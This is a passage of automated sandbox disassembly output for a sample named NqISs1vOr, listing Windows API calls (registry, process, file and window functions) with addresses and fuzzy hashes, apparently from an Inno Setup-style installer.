                                                                  • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047BFEA,00000000,0047C124), ref: 0047BDE9
                                                                  Strings
                                                                  • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047BDB9
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: CloseOpen
                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                  • API String ID: 47109696-1019749484
                                                                  • Opcode ID: f9eb47421012cec5c34730d2a4c0e30c6d7bbbf73eea55f5f75bb62311f339ce
                                                                  • Instruction ID: 054ff1380bf98a065617cb750ccb895fcb12562a11c78c2a0c7ed737f373e9e0
                                                                  • Opcode Fuzzy Hash: f9eb47421012cec5c34730d2a4c0e30c6d7bbbf73eea55f5f75bb62311f339ce
                                                                  • Instruction Fuzzy Hash: F2F082317045186BDA10A65F9C42BEBA69DCB84758F20403BF508DB343DAB99E0242EC
                                                                  APIs
                                                                  • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F352,?,?,00000000,0046F516,?,_is1,?), ref: 0046ECE7
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Value
                                                                  • String ID: NoModify
                                                                  • API String ID: 3702945584-1699962838
                                                                  • Opcode ID: 7eb4ab459c3921dc5338c7b3abf7fd5903c54a3e898984c04107b97a88657072
                                                                  • Instruction ID: 1140eb4c3ce40d11de990e217cdc8ecc45d3a806a677c2547659d4957ea667b8
                                                                  • Opcode Fuzzy Hash: 7eb4ab459c3921dc5338c7b3abf7fd5903c54a3e898984c04107b97a88657072
                                                                  • Instruction Fuzzy Hash: C6E04FB4640308BFEB04DB55DD4AF6AB7ECDB48724F104059BA049B280E674FE00C669
                                                                  APIs
                                                                  • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                  Strings
                                                                  • System\CurrentControlSet\Control\Windows, xrefs: 0042DE2E
                                                                  Similarity
                                                                  • API ID: Open
                                                                  • String ID: System\CurrentControlSet\Control\Windows
                                                                  • API String ID: 71445658-1109719901
                                                                  • Opcode ID: 3bdcab3ffa95dd7854a6d474c2ff8c4d7b332cac827883cc7250e5693ef667ec
                                                                  • Instruction ID: d7cc6eff87d81a3ef1983a0911a62a1ada5c46f4ff843c2b0821017aeb54f6c2
                                                                  • Opcode Fuzzy Hash: 3bdcab3ffa95dd7854a6d474c2ff8c4d7b332cac827883cc7250e5693ef667ec
                                                                  • Instruction Fuzzy Hash: 88D0C972910228BBEB00DE89DC41DFB77ADDB19760F45802AFD04AB241C6B4EC519BF8
                                                                  APIs
                                                                  • GetACP.KERNEL32(?,?,00000001,00000000,0047DD9B,?,-0000001A,0047FC14,-00000010,?,00000004,0000001B,00000000,0047FF61,?,0045D988), ref: 0047DB32
                                                                    • Part of subcall function 0042E314: 73A1A570.USER32(00000000,00000000,0047FFC8,?,?,00000001,00000000,00000002,00000000,004808CA,?,?,?,?,?,004981E7), ref: 0042E323
                                                                    • Part of subcall function 0042E314: EnumFontsA.GDI32(?,00000000,0042E300,00000000,00000000,0042E36C,?,00000000,00000000,0047FFC8,?,?,00000001,00000000,00000002,00000000), ref: 0042E34E
                                                                    • Part of subcall function 0042E314: 73A1A480.USER32(00000000,?,0042E373,00000000,00000000,0042E36C,?,00000000,00000000,0047FFC8,?,?,00000001,00000000,00000002,00000000), ref: 0042E366
                                                                  • SendNotifyMessageA.USER32(000403E6,00000496,00002711,-00000001), ref: 0047DD02
                                                                  Similarity
                                                                  • API ID: A480A570EnumFontsMessageNotifySend
                                                                  • String ID:
                                                                  • API String ID: 2685184028-0
                                                                  • Opcode ID: 1699f4068c0c5867e7106ba40e3d9973070bda02754bb9a23a09a502d1616ce7
                                                                  • Instruction ID: 990e0cae6f69a79882f0940071147895bcf3dc4f71101f62f717fb2ce75f629c
                                                                  • Opcode Fuzzy Hash: 1699f4068c0c5867e7106ba40e3d9973070bda02754bb9a23a09a502d1616ce7
                                                                  • Instruction Fuzzy Hash: FD517074A101008BCB21EF26E98169637B9EF94308B50C57BA8499F367C778ED46CB9D
                                                                  APIs
                                                                  • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DFCE,?,?,00000008,00000000,00000000,0042DFFB), ref: 0042DF64
                                                                  • RegCloseKey.ADVAPI32(?,0042DFD5,?,00000000,00000000,00000000,00000000,00000000,0042DFCE,?,?,00000008,00000000,00000000,0042DFFB), ref: 0042DFC8
                                                                  Similarity
                                                                  • API ID: CloseEnum
                                                                  • String ID:
                                                                  • API String ID: 2818636725-0
                                                                  • Opcode ID: 9f8261b046af4c0305013da9979aadb613cc1e3f6400fb4ebe2b883e54c4606e
                                                                  • Instruction ID: c872a63f9528d4f9380aaceb5e2d891e8c563da0940016be03c3acb485ce214c
                                                                  • Opcode Fuzzy Hash: 9f8261b046af4c0305013da9979aadb613cc1e3f6400fb4ebe2b883e54c4606e
                                                                  • Instruction Fuzzy Hash: A8319370F04258AEDB11DFA6DD42BBFBBB9EB49304F92447BE401E6281D6385E01CA1D
                                                                  APIs
                                                                  • CreateProcessA.KERNEL32(00000000,00000000,?,?,00458098,00000000,00458080,?,?,?,00000000,00452836,?,?,?,00000001), ref: 00452810
                                                                  • GetLastError.KERNEL32(00000000,00000000,?,?,00458098,00000000,00458080,?,?,?,00000000,00452836,?,?,?,00000001), ref: 00452818
                                                                  Similarity
                                                                  • API ID: CreateErrorLastProcess
                                                                  • String ID:
                                                                  • API String ID: 2919029540-0
                                                                  • Opcode ID: e0555b4cbc397befea5ce91cbbea4dedbfe526bfc705885143054cd240055755
                                                                  • Instruction ID: e9b66965f7ed38539142cc2995e542ed63b4c0771d7d6ba66a5e4ac3981b0267
                                                                  • Opcode Fuzzy Hash: e0555b4cbc397befea5ce91cbbea4dedbfe526bfc705885143054cd240055755
                                                                  • Instruction Fuzzy Hash: 70113C72604608AF8B50DEADDD41D9FB7ECEB4D310B114567FD18D3241D674AD148BA8
                                                                  APIs
                                                                  • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040AFDA
                                                                  • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040B137,00000000,0040B14F,?,?,?,00000000), ref: 0040AFEB
                                                                  Similarity
                                                                  • API ID: Resource$FindFree
                                                                  • String ID:
                                                                  • API String ID: 4097029671-0
                                                                  • Opcode ID: bd4d08f36a9d4a560adef0fa1bde098128f2b715f965cb3459cef9598ac6c158
                                                                  • Instruction ID: aeeba5ce467f8effdb78304bcd792b874f75604bed8582862ca5d9c37e282381
                                                                  • Opcode Fuzzy Hash: bd4d08f36a9d4a560adef0fa1bde098128f2b715f965cb3459cef9598ac6c158
                                                                  • Instruction Fuzzy Hash: CE01DF71700700AFDB14EF65AC92A1B77ADDB4A714B11807AF400AB3D1DA39AC019AA9
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 0041EEEB
                                                                  • 73A25940.USER32(00000000,0041EE4C,00000000,00000000,0041EF08,?,00000000,0041EF3F,?,0042EEA8,?,00000001), ref: 0041EEF1
                                                                  Similarity
                                                                  • API ID: A25940CurrentThread
                                                                  • String ID:
                                                                  • API String ID: 2655091166-0
                                                                  • Opcode ID: b000ad2c2d45302efb537f6ed51b85bb3a5cc49cf8a353236d3522148df1097f
                                                                  • Instruction ID: ec06e6b8def62778297c6a117e91140491810bf1675edd7fb5fc45fb14f34894
                                                                  • Opcode Fuzzy Hash: b000ad2c2d45302efb537f6ed51b85bb3a5cc49cf8a353236d3522148df1097f
                                                                  • Instruction Fuzzy Hash: D9015B76A04604BFD706CF6BDC1199ABBE8E789720B22887BEC04D3690E6355810DF18
                                                                  APIs
                                                                  • MoveFileA.KERNEL32(00000000,00000000), ref: 00452C96
                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,00452CBC), ref: 00452C9E
                                                                  Similarity
                                                                  • API ID: ErrorFileLastMove
                                                                  • String ID:
                                                                  • API String ID: 55378915-0
                                                                  • Opcode ID: 4b3f53bb71bbb3de239a758d95ad3dd7b2750d400091be83cb52db7a615a65e0
                                                                  • Instruction ID: 72322736c602c8c7a1920fbe291f5aeb87443d44c1116871956ce6e3077d7411
                                                                  • Opcode Fuzzy Hash: 4b3f53bb71bbb3de239a758d95ad3dd7b2750d400091be83cb52db7a615a65e0
                                                                  • Instruction Fuzzy Hash: C9012671B00604AB8B01EB799D4189EB7ECDB4A32575045BBFC14E3343EA784E04456C
                                                                  APIs
                                                                  • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004527A3), ref: 0045277D
                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,004527A3), ref: 00452785
                                                                  Similarity
                                                                  • API ID: CreateDirectoryErrorLast
                                                                  • String ID:
                                                                  • API String ID: 1375471231-0
                                                                  • Opcode ID: 9ee879c615aac4fee22e4c99406f95e71c245cbd6d77cc6155be40721354894d
                                                                  • Instruction ID: e798b8fcaf2c893210dd6dd972d3083c0fc79cae1e6532b7171fe4e83a13409b
                                                                  • Opcode Fuzzy Hash: 9ee879c615aac4fee22e4c99406f95e71c245cbd6d77cc6155be40721354894d
                                                                  • Instruction Fuzzy Hash: E1F02871A04604BFCB00EF759E4159EB3E8DB0E721B1045B7FC04E3242E7B94E048598
                                                                  APIs
                                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 00423241
                                                                  • LoadCursorA.USER32(00000000,00000000), ref: 0042326B
                                                                  Similarity
                                                                  • API ID: CursorLoad
                                                                  • String ID:
                                                                  • API String ID: 3238433803-0
                                                                  • Opcode ID: 57390d314a1cb7161e6ddc30cf2ec12f57c29d9a020bc84e90da4252d8f033e1
                                                                  • Instruction ID: 59516fef74be350ba7f17c0e511b54e8d6c2303d910d3728eb6a55db14448276
                                                                  • Opcode Fuzzy Hash: 57390d314a1cb7161e6ddc30cf2ec12f57c29d9a020bc84e90da4252d8f033e1
                                                                  • Instruction Fuzzy Hash: 68F0271170421066D6109E3E6CC0A6B72A8DF82335B71037BFB3EC72D1CA2E1D414569
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00008000), ref: 0042E396
                                                                  • LoadLibraryA.KERNEL32(00000000,00000000,0042E3E0,?,00000000,0042E3FE,?,00008000), ref: 0042E3C5
                                                                  Similarity
                                                                  • API ID: ErrorLibraryLoadMode
                                                                  • String ID:
                                                                  • API String ID: 2987862817-0
                                                                  • Opcode ID: 5e1e313bdd13d7489a01f7e50f084508f9c5c97fde52d832d9963c9b8019f2bb
                                                                  • Instruction ID: aa33dc687cd71512c069df69893670fc4fcbad3b08ca7d4395289e8ee6212cdb
                                                                  • Opcode Fuzzy Hash: 5e1e313bdd13d7489a01f7e50f084508f9c5c97fde52d832d9963c9b8019f2bb
                                                                  • Instruction Fuzzy Hash: 13F08270714B44BFDB019F779CA282BBBECEB49B1179249B6FD00A3691E53C5910C928
                                                                  APIs
                                                                  • GetClassInfoA.USER32(00400000,?,?), ref: 004162D9
                                                                  • GetClassInfoA.USER32(00000000,?,?), ref: 004162E9
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: ClassInfo
                                                                  • String ID:
                                                                  • API String ID: 3534257612-0
                                                                  APIs
                                                                  • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,0046FF69,?,00000000), ref: 004508E2
                                                                  • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,0046FF69,?,00000000), ref: 004508EA
                                                                    • Part of subcall function 00450688: GetLastError.KERNEL32(004504A4,0045074A,?,00000000,?,00497338,00000001,00000000,00000002,00000000,00497499,?,?,00000005,00000000,004974CD), ref: 0045068B
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: ErrorLast$FilePointer
                                                                  • String ID:
                                                                  • API String ID: 1156039329-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: Global$AllocLock
                                                                  • String ID:
                                                                  • API String ID: 15508794-0
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: Virtual$AllocFree
                                                                  • String ID:
                                                                  • API String ID: 2087232378-0
                                                                  APIs
                                                                  • GetSystemDefaultLCID.KERNEL32(00000000,00408702), ref: 004085EB
                                                                    • Part of subcall function 00406DDC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406DF9
                                                                    • Part of subcall function 00408558: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408623,?,00000000,00408702), ref: 00408576
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: DefaultInfoLoadLocaleStringSystem
                                                                  • String ID:
                                                                  • API String ID: 1658689577-0
                                                                  APIs
                                                                  • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC31
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: InfoScroll
                                                                  • String ID:
                                                                  • API String ID: 629608716-0
                                                                  APIs
                                                                    • Part of subcall function 0041EE9C: GetCurrentThreadId.KERNEL32 ref: 0041EEEB
                                                                    • Part of subcall function 0041EE9C: 73A25940.USER32(00000000,0041EE4C,00000000,00000000,0041EF08,?,00000000,0041EF3F,?,0042EEA8,?,00000001), ref: 0041EEF1
                                                                  • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046C2CE,?,00000000,?,?,0046C4E0,?,00000000,0046C554), ref: 0046C2B2
                                                                    • Part of subcall function 0041EF50: IsWindow.USER32(?), ref: 0041EF5E
                                                                    • Part of subcall function 0041EF50: EnableWindow.USER32(?,00000001), ref: 0041EF6D
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: Window$A25940CurrentEnablePathPrepareThreadWrite
                                                                  • String ID:
                                                                  • API String ID: 390483697-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: FileWrite
                                                                  • String ID:
                                                                  • API String ID: 3934441357-0
                                                                  APIs
                                                                  • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 0041657D
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: CreateWindow
                                                                  • String ID:
                                                                  • API String ID: 716092398-0
                                                                  APIs
                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149E7
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: CallbackDispatcherUser
                                                                  • String ID:
                                                                  • API String ID: 2492992576-0
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004507D8
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  APIs
                                                                  • GetFileAttributesA.KERNEL32(00000000,00000000,0042CD0C,?,00000001,?,?,00000000,?,0042CD5E,00000000,004529F9,00000000,00452A1A,?,00000000), ref: 0042CCEF
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  APIs
                                                                  • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453247,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8DF
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: FormatMessage
                                                                  • String ID:
                                                                  • API String ID: 1306739567-0
                                                                  • Opcode ID: e6d3d52e8f4f63ecf0b34621506695ba35df63bdde710507be70f7165fd629ff
                                                                  • Instruction ID: 2ce6c9ff4e19e0960d9753b9113d8e2cc47385edbc752d5ed3014e636873cb34
                                                                  • Opcode Fuzzy Hash: e6d3d52e8f4f63ecf0b34621506695ba35df63bdde710507be70f7165fd629ff
                                                                  • Instruction Fuzzy Hash: 90E0D86178831116F23535566C43B77150E4380708F9840277B809E3D3D6AE9905A25E
                                                                  APIs
                                                                  • CreateWindowExA.USER32(00000000,00423674,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04), ref: 00406311
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CreateWindow
                                                                  • String ID:
                                                                  • API String ID: 716092398-0
                                                                  • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                  • Instruction ID: 53e57476791a39574122dfc8a3f58f2f78c4a621b5a82e38d1c80b15216a1e52
                                                                  • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                  • Instruction Fuzzy Hash: EEE0FEB2214209BBDB00DE8ADCC1DABB7ACFB4C654F808105BB1C972428275AC608B71
                                                                  APIs
                                                                  • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE08
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Create
                                                                  • String ID:
                                                                  • API String ID: 2289755597-0
                                                                  • Opcode ID: a2fa4b3b70172a899a44371cb6cb166e106d6f14f5a748d009f698e06f133ef9
                                                                  • Instruction ID: bece317731ff8cd2e666e34543c7a68b5f38d577bb060a1f695f350ce1c31ea4
                                                                  • Opcode Fuzzy Hash: a2fa4b3b70172a899a44371cb6cb166e106d6f14f5a748d009f698e06f133ef9
                                                                  • Instruction Fuzzy Hash: 46E07EB2610129AFDB40DE8CDC81EEB37ADAB1D350F404016FA08D7200C274EC519BB4
                                                                  APIs
                                                                  • FindClose.KERNEL32(00000000,000000FF,0047078C,00000000,00471588,?,00000000,004715D1,?,00000000,0047170A,?,00000000,?,00000000), ref: 00454BE2
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CloseFind
                                                                  • String ID:
                                                                  • API String ID: 1863332320-0
                                                                  • Opcode ID: 06d429211cbdde73cb23459f0bbdb60b04e95dac6161286f70ab338dbad9895d
                                                                  • Instruction ID: 5b38ea55cb3c31d0920dcaeaf3b0ab9c64c5d1fc8265480bc1e0bc694521aac9
                                                                  • Opcode Fuzzy Hash: 06d429211cbdde73cb23459f0bbdb60b04e95dac6161286f70ab338dbad9895d
                                                                  • Instruction Fuzzy Hash: C3E092B0A056008BCB14DF3A898031A7AD29FC9324F04C56AEC9CCF3D7E63DC8594A27
                                                                  APIs
                                                                  • KiUserCallbackDispatcher.NTDLL(00494EF2,?,00494F14,?,?,00000000,00494EF2,?,?), ref: 00414693
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CallbackDispatcherUser
                                                                  • String ID:
                                                                  • API String ID: 2492992576-0
                                                                  • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                  • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                                  • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                  • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                                                  APIs
                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F14
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite
                                                                  • String ID:
                                                                  • API String ID: 3934441357-0
                                                                  • Opcode ID: 5f93265df2524d0dcc0c9b34101366d534c30ce5f0cb0d235cb6b24d2b8f20db
                                                                  • Instruction ID: cfde3e3822fa8edba560b3c3045b88a59d445a8db7eea6df610edd37a4bd72e7
                                                                  • Opcode Fuzzy Hash: 5f93265df2524d0dcc0c9b34101366d534c30ce5f0cb0d235cb6b24d2b8f20db
                                                                  • Instruction Fuzzy Hash: A3D012722081516AD220965AAC44EAB6BDCCBC5770F11063AB558C2181D7609C01C675
                                                                  APIs
                                                                    • Part of subcall function 004235F0: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 00423605
                                                                  • ShowWindow.USER32(00410648,00000009,?,00000000,0041ED9C,00423932,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04), ref: 0042365F
                                                                    • Part of subcall function 00423620: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 0042363C
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: InfoParametersSystem$ShowWindow
                                                                  • String ID:
                                                                  • API String ID: 3202724764-0
                                                                  • Opcode ID: fce0b26c2d9ed10aeec85bb6dc1e2ec36172a6d8969be9752991d6a22a5a0e05
                                                                  • Instruction ID: ebc5fdb8686796c5fd5eba84b5ab6671b787b6de9fbea9510ee25edb69bb1d0b
                                                                  • Opcode Fuzzy Hash: fce0b26c2d9ed10aeec85bb6dc1e2ec36172a6d8969be9752991d6a22a5a0e05
                                                                  • Instruction Fuzzy Hash: 7CD05E123412703182307ABB384598B46AC8D922A6749043BB4448B347ED5DCE1110BC
                                                                  APIs
                                                                  • SetWindowTextA.USER32(?,00000000), ref: 004242D4
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: TextWindow
                                                                  • String ID:
                                                                  • API String ID: 530164218-0
                                                                  • Opcode ID: 63c2204a93b3ceeccd91b68fb1f2f63f98ac991c37a9674dd692e28dceb45842
                                                                  • Instruction ID: 82e7bab73c65a9778cea5b734bd50d71f4a8736701fc7bbe01534373bbdf07f9
                                                                  • Opcode Fuzzy Hash: 63c2204a93b3ceeccd91b68fb1f2f63f98ac991c37a9674dd692e28dceb45842
